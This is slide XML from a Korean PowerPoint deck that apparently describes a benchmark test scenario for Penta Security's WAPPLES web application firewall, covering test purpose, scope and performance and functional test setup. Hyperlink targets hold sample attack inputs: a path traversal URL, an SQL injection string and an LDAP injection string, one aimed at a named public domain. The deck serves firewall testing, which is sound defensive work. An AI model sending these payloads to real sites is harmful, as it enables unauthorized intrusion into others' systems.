                    <a:gd name="connsiteX1" fmla="*/ 29432 w 85725"/>
                    <a:gd name="connsiteY1" fmla="*/ 94583 h 95250"/>
                    <a:gd name="connsiteX2" fmla="*/ 14097 w 85725"/>
                    <a:gd name="connsiteY2" fmla="*/ 84582 h 95250"/>
                    <a:gd name="connsiteX3" fmla="*/ 3810 w 85725"/>
                    <a:gd name="connsiteY3" fmla="*/ 69152 h 95250"/>
                    <a:gd name="connsiteX4" fmla="*/ 0 w 85725"/>
                    <a:gd name="connsiteY4" fmla="*/ 49244 h 95250"/>
                    <a:gd name="connsiteX5" fmla="*/ 0 w 85725"/>
                    <a:gd name="connsiteY5" fmla="*/ 48959 h 95250"/>
                    <a:gd name="connsiteX6" fmla="*/ 3429 w 85725"/>
                    <a:gd name="connsiteY6" fmla="*/ 29909 h 95250"/>
                    <a:gd name="connsiteX7" fmla="*/ 12954 w 85725"/>
                    <a:gd name="connsiteY7" fmla="*/ 14288 h 95250"/>
                    <a:gd name="connsiteX8" fmla="*/ 27527 w 85725"/>
                    <a:gd name="connsiteY8" fmla="*/ 3810 h 95250"/>
                    <a:gd name="connsiteX9" fmla="*/ 46101 w 85725"/>
                    <a:gd name="connsiteY9" fmla="*/ 0 h 95250"/>
                    <a:gd name="connsiteX10" fmla="*/ 65818 w 85725"/>
                    <a:gd name="connsiteY10" fmla="*/ 4096 h 95250"/>
                    <a:gd name="connsiteX11" fmla="*/ 79915 w 85725"/>
                    <a:gd name="connsiteY11" fmla="*/ 15145 h 95250"/>
                    <a:gd name="connsiteX12" fmla="*/ 88392 w 85725"/>
                    <a:gd name="connsiteY12" fmla="*/ 31242 h 95250"/>
                    <a:gd name="connsiteX13" fmla="*/ 91250 w 85725"/>
                    <a:gd name="connsiteY13" fmla="*/ 50578 h 95250"/>
                    <a:gd name="connsiteX14" fmla="*/ 91154 w 85725"/>
                    <a:gd name="connsiteY14" fmla="*/ 53531 h 95250"/>
                    <a:gd name="connsiteX15" fmla="*/ 90868 w 85725"/>
                    <a:gd name="connsiteY15" fmla="*/ 56674 h 95250"/>
                    <a:gd name="connsiteX16" fmla="*/ 21717 w 85725"/>
                    <a:gd name="connsiteY16" fmla="*/ 56674 h 95250"/>
                    <a:gd name="connsiteX17" fmla="*/ 30861 w 85725"/>
                    <a:gd name="connsiteY17" fmla="*/ 74390 h 95250"/>
                    <a:gd name="connsiteX18" fmla="*/ 48768 w 85725"/>
                    <a:gd name="connsiteY18" fmla="*/ 80582 h 95250"/>
                    <a:gd name="connsiteX19" fmla="*/ 62675 w 85725"/>
                    <a:gd name="connsiteY19" fmla="*/ 77724 h 95250"/>
                    <a:gd name="connsiteX20" fmla="*/ 74295 w 85725"/>
                    <a:gd name="connsiteY20" fmla="*/ 69342 h 95250"/>
                    <a:gd name="connsiteX21" fmla="*/ 86963 w 85725"/>
                    <a:gd name="connsiteY21" fmla="*/ 80582 h 95250"/>
                    <a:gd name="connsiteX22" fmla="*/ 70866 w 85725"/>
                    <a:gd name="connsiteY22" fmla="*/ 93440 h 95250"/>
                    <a:gd name="connsiteX23" fmla="*/ 48387 w 85725"/>
                    <a:gd name="connsiteY23" fmla="*/ 98108 h 95250"/>
                    <a:gd name="connsiteX24" fmla="*/ 69723 w 85725"/>
                    <a:gd name="connsiteY24" fmla="*/ 42291 h 95250"/>
                    <a:gd name="connsiteX25" fmla="*/ 67437 w 85725"/>
                    <a:gd name="connsiteY25" fmla="*/ 32576 h 95250"/>
                    <a:gd name="connsiteX26" fmla="*/ 62579 w 85725"/>
                    <a:gd name="connsiteY26" fmla="*/ 24765 h 95250"/>
                    <a:gd name="connsiteX27" fmla="*/ 55340 w 85725"/>
                    <a:gd name="connsiteY27" fmla="*/ 19526 h 95250"/>
                    <a:gd name="connsiteX28" fmla="*/ 45815 w 85725"/>
                    <a:gd name="connsiteY28" fmla="*/ 17526 h 95250"/>
                    <a:gd name="connsiteX29" fmla="*/ 29337 w 85725"/>
                    <a:gd name="connsiteY29" fmla="*/ 24384 h 95250"/>
                    <a:gd name="connsiteX30" fmla="*/ 21431 w 85725"/>
                    <a:gd name="connsiteY30" fmla="*/ 42291 h 95250"/>
                    <a:gd name="connsiteX31" fmla="*/ 69723 w 85725"/>
                    <a:gd name="connsiteY31" fmla="*/ 42291 h 95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85725" h="95250">
                      <a:moveTo>
                        <a:pt x="48387" y="98108"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="41624" y="98108"/>
                        <a:pt x="35242" y="96869"/>
                        <a:pt x="29432" y="94583"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23622" y="92297"/>
                        <a:pt x="18479" y="88868"/>
                        <a:pt x="14097" y="84582"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9716" y="80296"/>
                        <a:pt x="6382" y="75152"/>
                        <a:pt x="3810" y="69152"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1238" y="63151"/>
                        <a:pt x="0" y="56483"/>
                        <a:pt x="0" y="49244"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="48959"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="42196"/>
                        <a:pt x="1143" y="35814"/>
                        <a:pt x="3429" y="29909"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5715" y="24003"/>
                        <a:pt x="8858" y="18764"/>
                        <a:pt x="12954" y="14288"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17050" y="9811"/>
                        <a:pt x="21908" y="6287"/>
                        <a:pt x="27527" y="3810"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33147" y="1238"/>
                        <a:pt x="39338" y="0"/>
                        <a:pt x="46101" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53626" y="0"/>
                        <a:pt x="60198" y="1334"/>
                        <a:pt x="65818" y="4096"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="71438" y="6858"/>
                        <a:pt x="76200" y="10478"/>
                        <a:pt x="79915" y="15145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83629" y="19812"/>
                        <a:pt x="86487" y="25146"/>
                        <a:pt x="88392" y="31242"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90297" y="37338"/>
                        <a:pt x="91250" y="43815"/>
                        <a:pt x="91250" y="50578"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="91250" y="51530"/>
                        <a:pt x="91250" y="52483"/>
                        <a:pt x="91154" y="53531"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="91059" y="54578"/>
                        <a:pt x="90964" y="55626"/>
                        <a:pt x="90868" y="56674"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21717" y="56674"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="22955" y="64389"/>
                        <a:pt x="26003" y="70295"/>
                        <a:pt x="30861" y="74390"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35814" y="78486"/>
                        <a:pt x="41815" y="80582"/>
                        <a:pt x="48768" y="80582"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54102" y="80582"/>
                        <a:pt x="58769" y="79629"/>
                        <a:pt x="62675" y="77724"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66580" y="75819"/>
                        <a:pt x="70485" y="73057"/>
                        <a:pt x="74295" y="69342"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="86963" y="80582"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="82487" y="85915"/>
                        <a:pt x="77057" y="90202"/>
                        <a:pt x="70866" y="93440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64675" y="96679"/>
                        <a:pt x="57055" y="98108"/>
                        <a:pt x="48387" y="98108"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="69723" y="42291"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="69342" y="38862"/>
                        <a:pt x="68580" y="35624"/>
                        <a:pt x="67437" y="32576"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66199" y="29528"/>
                        <a:pt x="64675" y="26956"/>
                        <a:pt x="62579" y="24765"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60579" y="22574"/>
                        <a:pt x="58103" y="20765"/>
                        <a:pt x="55340" y="19526"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="52578" y="18193"/>
                        <a:pt x="49339" y="17526"/>
                        <a:pt x="45815" y="17526"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39148" y="17526"/>
                        <a:pt x="33623" y="19812"/>
                        <a:pt x="29337" y="24384"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25051" y="28956"/>
                        <a:pt x="22384" y="34957"/>
                        <a:pt x="21431" y="42291"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="69723" y="42291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 w="344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</p:grp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4ACED-6144-4B78-9E59-762D97A9E27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C4A818-AB0F-44F2-863E-F9D704839721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" y="6662520"/>
            <a:ext cx="1224950" cy="19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02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  <p:sldLayoutId id="2147483671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64" r:id="rId10"/>
    <p:sldLayoutId id="2147483673" r:id="rId11"/>
    <p:sldLayoutId id="2147483672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192.168.63.246/%25%25%25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st.com/" TargetMode="Externa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://192.168.40.245/%2f..%2f..%2f..%2f..%2fadmin%2flogin.jsp" TargetMode="Externa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172.16.100.168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daehwan.co.kr/?act=&amp;vid=&amp;mid=board&amp;category=&amp;search_target=title_content&amp;search_keyword=blah%27+or+1%3D1+or+%27a%27%3D%27a" TargetMode="Externa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daehwan.co.kr/?vid=&amp;mid=board&amp;act=IS&amp;is_keyword=user%3D*%29%28uid%3D*%29%29%28%7C%28uid%3D*+pass%3Dpassword" TargetMode="Externa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kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>WAPPLES</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="부제 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375115" y="3677556"/>
            <a:ext cx="8083085" cy="367152"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>웹보안부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>BMT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 시나리오</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="내용 개체 틀 5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kumimoji="1" lang="en-US" altLang="ko-KR"/>
              <a:t>2022.03.24</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>펜타시큐리티시스템</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>㈜</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112085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z="2400" dirty="0"/>
              <a:t>목차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sz="1600" dirty="0"/>
              <a:t>시험 개요</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>시험 구성도</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>시험 항목</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1757810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-122962" y="2037536"/>
            <a:ext cx="8394485" cy="1286633"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>시험 개요</a:t>
            </a:r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E28E4E2E-0F8A-404C-BE29-90C770433175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3400950" y="3120190"/>
            <a:ext cx="5338167" cy="3168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ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>목적</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>범위</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>시험평가 항목</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/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23832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/>
              <a:t>시험 개요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5CC2EDE-B594-4067-BD3B-505F04083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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>목적</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>웹방화벽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>이하</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>, WAF)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>의 보안기능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>성능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>운영 및 관리 기능에 대한 시험을 통해</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>종합적으로 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>평가하여 안정적인 구축 및 효율적인 운영을 위한 기초 자료로 활용하는데 목적을 둠</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>범위</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> 시험 및 평가 진행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>시험평가 항목</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>성능 시험</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>시험 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>의 웹 트래픽 처리 성능을 테스트 함</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>계측기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>(Avalanche)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>을 이용하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>웹 트래픽 발생시</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>, WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>의 최대 처리량 측정</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>기능 시험</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>시험 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>에서 항목 별 기능 지원 여부를 테스트 함</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>보안기능 및 관리기능 지원 여부에 대해 테스트 및 평가</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="527400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2763649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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-122962" y="2037536"/>
            <a:ext cx="8394485" cy="1286633"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>시험 구성도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E28E4E2E-0F8A-404C-BE29-90C770433175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3400950" y="3120190"/>
            <a:ext cx="5338167" cy="3168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ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>기능시험 구성</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>성능시험 구성</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2538097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시험 구성도</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="86" name="그룹 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4608D1CB-D85F-4E75-A824-8B23AA1A2586}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1822558" y="1276350"/>
            <a:ext cx="5461805" cy="4566853"/>
            <a:chOff x="1979576" y="1276350"/>
            <a:chExt cx="5461805" cy="4566853"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="Content Placeholder 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B504B5C-6BDF-493C-AE5E-C2CF3C1F0AE3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3974202" y="1276350"/>
              <a:ext cx="1195595" cy="367612"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" lIns="0" tIns="36000" rIns="0" bIns="36000" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr marL="380075" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPts val="2500"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buFont typeface="+mj-lt"/>
                <a:buAutoNum type="arabicPeriod"/>
                <a:defRPr sz="1400" b="1" kern="1200" baseline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나눔고딕"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="540000" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="500"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="tx1"/>
                </a:buClr>
                <a:buFont typeface="+mj-lt"/>
                <a:buAutoNum type="arabicParenR"/>
                <a:defRPr sz="1200" kern="1200" baseline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나눔고딕"/>
                </a:defRPr>
              </a:lvl2pPr>
              <a:lvl3pPr marL="792000" indent="-273050" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="400"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="tx1"/>
                </a:buClr>
                <a:buFont typeface="+mj-lt"/>
                <a:buAutoNum type="alphaUcPeriod"/>
                <a:defRPr sz="1100" kern="1200" baseline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나눔고딕"/>
                </a:defRPr>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1080000" indent="-274638" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="tx1"/>
                </a:buClr>
                <a:buFont typeface="+mj-ea"/>
                <a:buAutoNum type="circleNumDbPlain"/>
                <a:defRPr sz="1000" kern="1200" baseline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나눔고딕"/>
                </a:defRPr>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1332000" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="tx1"/>
                </a:buClr>
                <a:buFont typeface="+mj-lt"/>
                <a:buAutoNum type="alphaLcPeriod"/>
                <a:defRPr sz="1000" kern="1200" baseline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나눔고딕"/>
                </a:defRPr>
              </a:lvl5pPr>
              <a:lvl6pPr marL="36000" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                <a:buNone/>
                <a:defRPr sz="1200" kern="1200" baseline="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  <a:cs typeface="나눔고딕"/>
                </a:defRPr>
              </a:lvl6pPr>
              <a:lvl7pPr marL="29718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1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7175" indent="0">
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                <a:t>성능시험 구성</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="Group 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D568FC8-BAD0-4C50-9516-F0212FAAAE07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
